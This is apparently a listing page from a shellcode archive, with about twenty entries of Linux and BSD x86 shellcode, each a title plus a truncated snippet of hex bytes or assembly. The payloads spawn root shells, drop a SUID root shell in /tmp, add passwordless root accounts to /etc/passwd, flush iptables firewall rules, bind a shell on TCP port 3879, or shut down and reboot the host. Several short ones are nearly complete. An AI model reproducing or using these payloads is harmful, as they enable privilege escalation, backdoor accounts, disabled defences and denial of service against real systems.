Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...

Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126

/ linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. / char shellc = / Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax...

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)

/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : email protected Homepage: safemode.org File: w000t-shell.c / This shellcode will add a passwordless local root account 'w000t' Written by email protected Why so big ? it uses execve ;- /...

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)

Author: zillion Email: email protected Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File: flush-iptables-shell.c / This shellcode will do /sbin/iptables -F Written by email protected / char shellcode=...

Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push $0x74756873 "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 "\x68\x2f\x2f\x73\x62" // push $0x62732f2f "\x89\xe3" // mov...

BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)

/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...

Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...

Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)

include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can write "\x6a\x0b\x58" instead of "\xb0\x0b", but the...

BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)

/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...

Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)

/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...

BSD/x86 - execve (/bin/sh) + seteuid(0) Shellcode (31 bytes)

/ simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"...

Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)

include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...

Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...

Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)

/ Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx socket movl...

Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

/ This shellcode writes to /etc/passwd the string for the user with uid&gid == 0; written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: nerf w00w00 BITS 32 jmp short path main: pop esi xor eax,eax push eax mov byte esi+11,al mov al,0x0a push eax push esi mov al,5 push eax...

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)

include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...

BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

/ writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax push eax push byte 0x64 push word 0x7773 push long 0x7361702f push long 0x6374652f mov ebx,esp mov al,0x0...

Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)

/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...